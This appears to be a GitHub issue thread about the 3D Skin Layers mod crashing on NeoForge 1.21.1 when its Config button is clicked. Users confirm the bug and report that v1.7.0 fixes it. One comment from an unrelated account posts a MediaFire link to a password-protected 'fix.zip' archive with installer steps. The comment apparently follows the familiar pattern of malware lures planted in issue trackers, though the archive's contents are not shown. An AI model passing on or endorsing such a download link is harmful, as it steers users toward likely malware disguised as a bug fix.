### ISSUE TITLE
1.21.1 Neo variant, crash when clicking the `Config` in mods list

### ISSUE THREAD

**Issue by 3gf8jv4dv** [tr7zw/3d-Skin-Layers#174]
Crash Report *(Deleted)*

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NovaViper** [comment]
Can confirm the same the same issue on NeoForge 1.21.0 and 1.21.1 aswell

System Information:
Minecraft version: 1.21.1
3D Skin Layers version: 1.6.7
NeoForge version: 21.1.34
Logs: https://mclo.gs/f1lju8C

**Comment by NovaViper** [comment]
It is! Just tried it and the issue's fixed now on v1.7.0
